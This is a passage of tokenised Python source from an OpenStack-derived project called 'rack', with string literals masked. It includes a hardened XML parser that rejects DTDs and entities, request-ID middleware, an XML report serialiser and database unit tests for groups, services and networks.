<EOL> if master . version < self . min_vers : <EOL> return False <EOL> if self . max_vers is not None and master . version > self . max_vers : <EOL> return False <EOL> return True <EOL> class TemplateBuilder ( object ) : <EOL> """<STR_LIT>""" <EOL> _tmpl = None <EOL> def __new__ ( cls , copy = True ) : <EOL> """<STR_LIT>""" <EOL> if cls . _tmpl is None : <EOL> tmp = super ( TemplateBuilder , cls ) . __new__ ( cls ) <EOL> cls . _tmpl = tmp . construct ( ) <EOL> if copy and hasattr ( cls . _tmpl , '<STR_LIT>' ) : <EOL> return cls . _tmpl . copy ( ) <EOL> return cls . _tmpl <EOL> def construct ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( _ ( "<STR_LIT>" ) ) <EOL> def make_links ( parent , selector = None ) : <EOL> """<STR_LIT>""" <EOL> elem = SubTemplateElement ( parent , '<STR_LIT>' % XMLNS_ATOM , <EOL> selector = selector ) <EOL> elem . set ( '<STR_LIT>' ) <EOL> elem . set ( '<STR_LIT:type>' ) <EOL> elem . set ( '<STR_LIT>' ) <EOL> return elem <EOL> def make_flat_dict ( name , selector = None , subselector = None , <EOL> ns = None , colon_ns = False , root = None , <EOL> ignore_sub_dicts = False ) : <EOL> """<STR_LIT>""" <EOL> if ns is None : <EOL> elemname = name <EOL> tagname = Selector ( <NUM_LIT:0> ) <EOL> else : <EOL> elemname = '<STR_LIT>' % ( ns , name ) <EOL> tagname = lambda obj , do_raise = False : '<STR_LIT>' % ( ns , obj [ <NUM_LIT:0> ] ) <EOL> if selector is None : <EOL> selector = name <EOL> if not root : <EOL> root = TemplateElement ( elemname , selector = selector , <EOL> subselector = subselector , colon_ns = colon_ns ) <EOL> choice = get_items if ignore_sub_dicts is False else get_items_without_dict <EOL> elem = SubTemplateElement ( root , tagname , selector = choice , <EOL> colon_ns = colon_ns ) <EOL> elem . text = <NUM_LIT:1> <EOL> return root <EOL> class ProtectedExpatParser ( expatreader . ExpatParser ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , forbid_dtd = True , forbid_entities = True , <EOL> * args , ** kwargs ) : <EOL> expatreader . ExpatParser . __init__ ( self , * args , ** kwargs ) <EOL> self . forbid_dtd = forbid_dtd <EOL> self . forbid_entities = forbid_entities <EOL> def start_doctype_decl ( self , name , sysid , pubid , has_internal_subset ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def entity_decl ( self , entityName , is_parameter_entity , value , base , <EOL> systemId , publicId , notationName ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def unparsed_entity_decl ( self , name , base , sysid , pubid , notation_name ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def external_entity_ref ( self , context , base , systemId , publicId ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def notation_decl ( self , name , base , sysid , pubid ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def reset ( self ) : <EOL> expatreader . ExpatParser . reset ( self ) <EOL> if self . forbid_dtd : <EOL> self . _parser . StartDoctypeDeclHandler = self . start_doctype_decl <EOL> self . _parser . EndDoctypeDeclHandler = None <EOL> if self . forbid_entities : <EOL> self . _parser . EntityDeclHandler = self . entity_decl <EOL> self . _parser . UnparsedEntityDeclHandler = self . unparsed_entity_decl <EOL> self . _parser . ExternalEntityRefHandler = self . external_entity_ref <EOL> self . _parser . NotationDeclHandler = self . notation_decl <EOL> try : <EOL> self . _parser . SkippedEntityHandler = None <EOL> except AttributeError : <EOL> pass <EOL> def safe_minidom_parse_string ( xml_string ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return minidom . parseString ( xml_string , parser = ProtectedExpatParser ( ) ) <EOL> except ( sax . SAXParseException , ValueError , <EOL> expat . ExpatError , LookupError ) as e : <EOL> raise exception . MalformedRequestBody ( reason = str ( e ) ) </s>
<s> import inspect <EOL> class MissingArgs ( Exception ) : <EOL> def __init__ ( self , missing ) : <EOL> self . missing = missing <EOL> def __str__ ( self ) : <EOL> if len ( self . missing ) == <NUM_LIT:1> : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return ( "<STR_LIT>" % <EOL> dict ( num = len ( self . missing ) ) ) <EOL> def validate_args ( fn , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> argspec = inspect . getargspec ( fn ) <EOL> num_defaults = len ( argspec . defaults or [ ] ) <EOL> required_args = argspec . args [ : len ( argspec . args ) - num_defaults ] <EOL> def isbound ( method ) : <EOL> return getattr ( method , '<STR_LIT>' , None ) is not None <EOL> if isbound ( fn ) : <EOL> required_args . pop ( <NUM_LIT:0> ) <EOL> missing = [ arg for arg in required_args if arg not in kwargs ] <EOL> missing = missing [ len ( args ) : ] <EOL> if missing : <EOL> raise MissingArgs ( missing ) </s>
<s> """<STR_LIT>""" <EOL> from rack . openstack . common import context <EOL> from rack . openstack . common . middleware import base <EOL> ENV_REQUEST_ID = '<STR_LIT>' <EOL> HTTP_RESP_HEADER_REQUEST_ID = '<STR_LIT>' <EOL> class RequestIdMiddleware ( base . Middleware ) : <EOL> def process_request ( self , req ) : <EOL> self . req_id = context . generate_request_id ( ) <EOL> req . environ [ ENV_REQUEST_ID ] = self . req_id <EOL> def process_response ( self , response ) : <EOL> response . headers . add ( HTTP_RESP_HEADER_REQUEST_ID , self . req_id ) <EOL> return response </s>
<s> """<STR_LIT>""" <EOL> import collections as col <EOL> import copy <EOL> import xml . etree . ElementTree as ET <EOL> import six <EOL> import rack . openstack . common . report . utils as utils <EOL> class KeyValueView ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wrapper_name = "<STR_LIT>" ) : <EOL> self . wrapper_name = wrapper_name <EOL> def __call__ ( self , model ) : <EOL> cpy = copy . deepcopy ( model ) <EOL> for key , valstr in model . items ( ) : <EOL> if getattr ( valstr , '<STR_LIT>' , False ) : <EOL> cpy [ key ] = ET . fromstring ( valstr ) <EOL> def serialize ( rootmodel , rootkeyname ) : <EOL> res = ET . Element ( rootkeyname ) <EOL> if isinstance ( rootmodel , col . Mapping ) : <EOL> for key in rootmodel : <EOL> res . append ( serialize ( rootmodel [ key ] , key ) ) <EOL> elif ( isinstance ( rootmodel , col . Sequence ) <EOL> and not isinstance ( rootmodel , six . string_types ) ) : <EOL> for val in rootmodel : <EOL> res . append ( serialize ( val , '<STR_LIT>' ) ) <EOL> elif ET . iselement ( rootmodel ) : <EOL> res . append ( rootmodel ) <EOL> else : <EOL> res . text = str ( rootmodel ) <EOL> return res <EOL> res = utils . StringWithAttrs ( ET . tostring ( serialize ( cpy , <EOL> self . wrapper_name ) ) ) <EOL> res . __is_xml__ = True <EOL> return res </s>
<s> from rack import context <EOL> from rack import db <EOL> from rack import exception <EOL> from rack import test <EOL> import uuid <EOL> class ModelsObjectComparatorMixin ( object ) : <EOL> def _dict_from_object ( self , obj , ignored_keys ) : <EOL> if ignored_keys is None : <EOL> ignored_keys = [ ] <EOL> return dict ( [ ( k , v ) for k , v in obj . iteritems ( ) <EOL> if k not in ignored_keys ] ) <EOL> def _assertEqualObjects ( self , obj1 , obj2 , ignored_keys = None ) : <EOL> obj1 = self . _dict_from_object ( obj1 , ignored_keys ) <EOL> obj2 = self . _dict_from_object ( obj2 , ignored_keys ) <EOL> self . assertEqual ( len ( obj1 ) , <EOL> len ( obj2 ) , <EOL> "<STR_LIT>" % <EOL> str ( set ( obj1 . keys ( ) ) ^ set ( obj2 . keys ( ) ) ) ) <EOL> for key , value in obj1 . iteritems ( ) : <EOL> self . assertEqual ( value , obj2 [ key ] ) <EOL> def _assertEqualListsOfObjects ( self , objs1 , objs2 , ignored_keys = None ) : <EOL> obj_to_dict = lambda o : self . _dict_from_object ( o , ignored_keys ) <EOL> sort_key = lambda d : [ d [ k ] for k in sorted ( d ) ] <EOL> conv_and_sort = lambda obj : sorted ( map ( obj_to_dict , obj ) , <EOL> key = sort_key ) <EOL> self . assertEqual ( conv_and_sort ( objs1 ) , conv_and_sort ( objs2 ) ) <EOL> def _assertEqualOrderedListOfObjects ( self , objs1 , objs2 , <EOL> ignored_keys = None ) : <EOL> obj_to_dict = lambda o : self . _dict_from_object ( o , ignored_keys ) <EOL> conv = lambda obj : map ( obj_to_dict , obj ) <EOL> self . assertEqual ( conv ( objs1 ) , conv ( objs2 ) ) <EOL> def _assertEqualListsOfPrimitivesAsSets ( self , primitives1 , primitives2 ) : <EOL> self . assertEqual ( len ( primitives1 ) , len ( primitives2 ) ) <EOL> for primitive in primitives1 : <EOL> self . assertIn ( primitive , primitives2 ) <EOL> for primitive in primitives2 : <EOL> self . assertIn ( primitive , primitives1 ) <EOL> class GroupTestCase ( test . TestCase , ModelsObjectComparatorMixin ) : <EOL> def setUp ( self ) : <EOL> super ( GroupTestCase , self ) . setUp ( ) <EOL> self . ctxt = context . get_admin_context ( ) <EOL> self . user_ctxt = context . RequestContext ( '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> self . gid = unicode ( uuid . uuid4 ( ) ) <EOL> def test_group_get_all ( self ) : <EOL> groups = [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> ] <EOL> user_ids = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> created_groups_list = [ ] <EOL> for user_id in user_ids : <EOL> created_groups = [ self . _create_group ( group , user_id = user_id , <EOL> project_id = user_id ) <EOL> for group in groups ] <EOL> created_groups_list . append ( created_groups ) <EOL> ctext = context . RequestContext ( <EOL> user_id = user_ids [ <NUM_LIT:0> ] , project_id = user_ids [ <NUM_LIT:0> ] ) <EOL> res_groups = db . group_get_all ( ctext ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . assertEqual ( len ( res_groups ) , len ( created_groups_list [ <NUM_LIT:0> ] ) ) <EOL> for group in range ( <NUM_LIT:0> , len ( res_groups ) ) : <EOL> self . _assertEqualObjects ( <EOL> res_groups [ group ] , created_groups_list [ <NUM_LIT:0> ] [ group ] , <EOL> ignored_keys ) <EOL> def test_group_get_all_empty ( self ) : <EOL> ctext = context . RequestContext ( <EOL> user_id = "<STR_LIT>" , project_id = "<STR_LIT>" ) <EOL> res_groups = db . group_get_all ( ctext ) <EOL> expected = [ ] <EOL> self . assertEqual ( res_groups , expected ) <EOL> def test_group_get_by_gid ( self ) : <EOL> groups = [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> ] <EOL> user_id = "<STR_LIT>" <EOL> created_groups = [ self . _create_group ( <EOL> group , user_id = user_id , project_id = user_id ) for group in groups ] <EOL> gid = created_groups [ <NUM_LIT:1> ] [ "<STR_LIT>" ] <EOL> ctext = context . RequestContext ( <EOL> user_id = user_id , project_id = user_id ) <EOL> res_group = db . group_get_by_gid ( ctext , gid ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( res_group , created_groups [ <NUM_LIT:1> ] , ignored_keys ) <EOL> def test_group_get_by_gid_not_found ( self ) : <EOL> user_id = "<STR_LIT>" <EOL> ctext = context . RequestContext ( <EOL> user_id = user_id , project_id = user_id ) <EOL> gid = "<STR_LIT>" <EOL> status_code = <NUM_LIT:200> <EOL> try : <EOL> db . group_get_by_gid ( ctext , gid ) <EOL> except Exception as e : <EOL> status_code = e . code <EOL> self . assertEqual ( status_code , <NUM_LIT> ) <EOL> def _get_base_values ( self ) : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:status>' : '<STR_LIT>' <EOL> } <EOL> def _create_group ( self , values , user_id = None , project_id = None ) : <EOL> user_ctxt = context . RequestContext ( user_id , project_id ) <EOL> values [ '<STR_LIT>' ] = unicode ( uuid . uuid4 ( ) ) <EOL> values [ '<STR_LIT>' ] = user_id <EOL> values [ '<STR_LIT>' ] = project_id <EOL> v = self . _get_base_values ( ) <EOL> v . update ( values ) <EOL> return db . group_create ( user_ctxt , v ) <EOL> def test_group_create ( self ) : <EOL> values = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" <EOL> } <EOL> group = db . group_create ( self . user_ctxt , values ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> values . update ( { "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" } ) <EOL> self . assertIsNotNone ( group [ '<STR_LIT>' ] ) <EOL> self . _assertEqualObjects ( group , values , ignored_keys ) <EOL> def test_group_update ( self ) : <EOL> values_before = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" <EOL> } <EOL> group_before = db . group_create ( self . user_ctxt , values_before ) <EOL> values = { <EOL> "<STR_LIT>" : group_before [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> group = db . group_update ( self . user_ctxt , values ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:status>" ] <EOL> self . _assertEqualObjects ( group , values , ignored_keys ) <EOL> def test_group_delete ( self ) : <EOL> values_before = { <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" <EOL> } <EOL> db . group_create ( self . user_ctxt , values_before ) <EOL> deleted_group = db . group_delete ( self . ctxt , self . gid ) <EOL> self . assertEqual ( deleted_group [ "<STR_LIT>" ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( deleted_group [ "<STR_LIT:status>" ] , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( deleted_group . get ( "<STR_LIT>" ) ) <EOL> def test_group_update_gid_not_found ( self ) : <EOL> values_before = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" <EOL> } <EOL> group_before = db . group_create ( self . user_ctxt , values_before ) <EOL> values = { <EOL> "<STR_LIT>" : group_before [ "<STR_LIT>" ] + "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> try : <EOL> db . group_update ( self . user_ctxt , values ) <EOL> except Exception as e : <EOL> status_code = e . code <EOL> self . assertEqual ( status_code , <NUM_LIT> ) <EOL> def test_group_delete_not_found ( self ) : <EOL> self . assertRaises ( exception . GroupNotFound , <EOL> db . group_delete , <EOL> context = self . user_ctxt , <EOL> gid = self . gid ) <EOL> class ServiceTestCase ( test . TestCase , ModelsObjectComparatorMixin ) : <EOL> def setUp ( self ) : <EOL> super ( ServiceTestCase , self ) . setUp ( ) <EOL> self . ctxt = context . get_admin_context ( ) <EOL> def _get_base_values ( self ) : <EOL> return { <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def _create_service ( self , values ) : <EOL> v = self . _get_base_values ( ) <EOL> v . update ( values ) <EOL> return db . service_create ( self . ctxt , v ) <EOL> def test_service_create ( self ) : <EOL> service = self . _create_service ( { } ) <EOL> self . assertIsNotNone ( service [ '<STR_LIT:id>' ] ) <EOL> for key , value in self . _get_base_values ( ) . iteritems ( ) : <EOL> self . assertEqual ( value , service [ key ] ) <EOL> def test_service_destroy ( self ) : <EOL> service1 = self . _create_service ( { } ) <EOL> service2 = self . _create_service ( { '<STR_LIT:host>' : '<STR_LIT>' } ) <EOL> db . service_destroy ( self . ctxt , service1 [ '<STR_LIT:id>' ] ) <EOL> self . assertRaises ( exception . ServiceNotFound , <EOL> db . service_get , self . ctxt , service1 [ '<STR_LIT:id>' ] ) <EOL> self . _assertEqualObjects ( db . service_get ( self . ctxt , service2 [ '<STR_LIT:id>' ] ) , <EOL> service2 ) <EOL> def test_service_update ( self ) : <EOL> service = self . _create_service ( { } ) <EOL> new_values = { <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : True <EOL> } <EOL> db . service_update ( self . ctxt , service [ '<STR_LIT:id>' ] , new_values ) <EOL> updated_service = db . service_get ( self . ctxt , service [ '<STR_LIT:id>' ] ) <EOL> for key , value in new_values . iteritems ( ) : <EOL> self . assertEqual ( value , updated_service [ key ] ) <EOL> def test_service_update_not_found_exception ( self ) : <EOL> self . assertRaises ( exception . ServiceNotFound , <EOL> db . service_update , self . ctxt , <NUM_LIT> , { } ) <EOL> def test_service_get ( self ) : <EOL> service1 = self . _create_service ( { } ) <EOL> self . _create_service ( { '<STR_LIT:host>' : '<STR_LIT>' } ) <EOL> real_service1 = db . service_get ( self . ctxt , service1 [ '<STR_LIT:id>' ] ) <EOL> self . _assertEqualObjects ( service1 , real_service1 , <EOL> ignored_keys = [ '<STR_LIT>' ] ) <EOL> def test_service_get_not_found_exception ( self ) : <EOL> self . assertRaises ( exception . ServiceNotFound , <EOL> db . service_get , self . ctxt , <NUM_LIT> ) <EOL> def test_service_get_by_host_and_topic ( self ) : <EOL> service1 = self . _create_service ( { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . _create_service ( { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> real_service1 = db . service_get_by_host_and_topic ( self . ctxt , <EOL> host = '<STR_LIT>' , <EOL> topic = '<STR_LIT>' ) <EOL> self . _assertEqualObjects ( service1 , real_service1 ) <EOL> def test_service_get_all ( self ) : <EOL> values = [ <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : True } <EOL> ] <EOL> services = [ self . _create_service ( vals ) for vals in values ] <EOL> disabled_services = [ services [ - <NUM_LIT:1> ] ] <EOL> non_disabled_services = services [ : - <NUM_LIT:1> ] <EOL> compares = [ <EOL> ( services , db . service_get_all ( self . ctxt ) ) , <EOL> ( disabled_services , db . service_get_all ( self . ctxt , True ) ) , <EOL> ( non_disabled_services , db . service_get_all ( self . ctxt , False ) ) <EOL> ] <EOL> for comp in compares : <EOL> self . _assertEqualListsOfObjects ( * comp ) <EOL> def test_service_get_all_by_topic ( self ) : <EOL> values = [ <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ] <EOL> services = [ self . _create_service ( vals ) for vals in values ] <EOL> expected = services [ : <NUM_LIT:2> ] <EOL> real = db . service_get_all_by_topic ( self . ctxt , '<STR_LIT>' ) <EOL> self . _assertEqualListsOfObjects ( expected , real ) <EOL> def test_service_get_all_by_host ( self ) : <EOL> values = [ <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ] <EOL> services = [ self . _create_service ( vals ) for vals in values ] <EOL> expected = services [ : <NUM_LIT:2> ] <EOL> real = db . service_get_all_by_host ( self . ctxt , '<STR_LIT>' ) <EOL> self . _assertEqualListsOfObjects ( expected , real ) <EOL> def test_service_get_by_args ( self ) : <EOL> values = [ <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:a>' } , <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:b>' } <EOL> ] <EOL> services = [ self . _create_service ( vals ) for vals in values ] <EOL> service1 = db . service_get_by_args ( self . ctxt , '<STR_LIT>' , '<STR_LIT:a>' ) <EOL> self . _assertEqualObjects ( services [ <NUM_LIT:0> ] , service1 ) <EOL> service2 = db . service_get_by_args ( self . ctxt , '<STR_LIT>' , '<STR_LIT:b>' ) <EOL> self . _assertEqualObjects ( services [ <NUM_LIT:1> ] , service2 ) <EOL> def test_service_get_by_args_not_found_exception ( self ) : <EOL> self . assertRaises ( exception . HostBinaryNotFound , <EOL> db . service_get_by_args , <EOL> self . ctxt , '<STR_LIT>' , '<STR_LIT:a>' ) <EOL> def test_service_binary_exists_exception ( self ) : <EOL> db . service_create ( self . ctxt , self . _get_base_values ( ) ) <EOL> values = self . _get_base_values ( ) <EOL> values . update ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertRaises ( exception . ServiceBinaryExists , db . service_create , <EOL> self . ctxt , values ) <EOL> def test_service_topic_exists_exceptions ( self ) : <EOL> db . service_create ( self . ctxt , self . _get_base_values ( ) ) <EOL> values = self . _get_base_values ( ) <EOL> values . update ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertRaises ( exception . ServiceTopicExists , db . service_create , <EOL> self . ctxt , values ) <EOL> class NetworksTestCase ( test . TestCase , ModelsObjectComparatorMixin ) : <EOL> def setUp ( self ) : <EOL> super ( NetworksTestCase , self ) . setUp ( ) <EOL> self . ctxt = context . get_admin_context ( ) <EOL> self . gid = unicode ( uuid . uuid4 ( ) ) <EOL> self . network_id = unicode ( uuid . uuid4 ( ) ) <EOL> self . neutron_network_id = unicode ( uuid . uuid4 ( ) ) <EOL> self . ext_router_id = unicode ( uuid . uuid4 ( ) ) <EOL> def test_networks_create ( self ) : <EOL> values = { <EOL> "<STR_LIT>" : self . network_id , <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" + self . network_id , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> network = db . network_create ( self . ctxt , values ) <EOL> ignored_keys = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( network , values , ignored_keys ) <EOL> def test_network_get_all ( self ) : <EOL> values = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" + self . network_id , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> for i in range ( <NUM_LIT:1> - <NUM_LIT:5> ) : <EOL> values [ "<STR_LIT>" ] = "<STR_LIT>" + str ( i ) <EOL> db . network_create ( self . ctxt , values ) <EOL> network_list = db . network_get_all ( self . ctxt , self . gid ) <EOL> for network in network_list : <EOL> self . assertEqual ( network [ "<STR_LIT>" ] , self . gid ) <EOL> def test_network_get_all_return_empty_list ( self ) : <EOL> network_list = db . network_get_all ( self . ctxt , self . gid ) <EOL> self . assertEqual ( network_list , [ ] ) <EOL> def test_network_get_by_network_id ( self ) : <EOL> values = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" + self . network_id , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> for i in range ( <NUM_LIT:1> - <NUM_LIT:5> ) : <EOL> values [ "<STR_LIT>" ] = "<STR_LIT>" + str ( i ) <EOL> db . network_create ( self . ctxt , values ) <EOL> values [ "<STR_LIT>" ] = self . network_id <EOL> db . network_create ( self . ctxt , values ) <EOL> network = db . network_get_by_network_id ( <EOL> self . ctxt , self . gid , self . network_id ) <EOL> self . assertEqual ( network [ "<STR_LIT>" ] , self . network_id ) <EOL> def test_network_get_by_network_id_exception_notfound ( self ) : <EOL> values = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" + self . network_id , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> for i in range ( <NUM_LIT:1> - <NUM_LIT:5> ) : <EOL> values [ "<STR_LIT>" ] = "<STR_LIT>" + str ( i ) <EOL> db . network_create ( self . ctxt , values ) <EOL> self . assertRaises ( exception . NetworkNotFound , <EOL> db . network_get_by_network_id , <EOL> context = self . ctxt , <EOL> gid = self . gid , <EOL> network_id = self . network_id ) <EOL> def test_networks_update ( self ) : <EOL> create_values = { <EOL> "<STR_LIT>" : self . network_id , <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" + self . network_id , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> create_network = db . network_create ( self . ctxt , create_values ) <EOL> create_network [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> update_values = { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> db . network_update ( self . ctxt , self . network_id , update_values ) <EOL> network = db . network_get_by_network_id ( <EOL> self . ctxt , self . gid , self . network_id ) <EOL> ignored_keys = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . assertIsNotNone ( network [ "<STR_LIT>" ] ) <EOL> self . _assertEqualObjects ( network , create_network , ignored_keys ) <EOL> def test_network_delete ( self ) : <EOL> create_values = { <EOL> "<STR_LIT>" : self . network_id , <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> 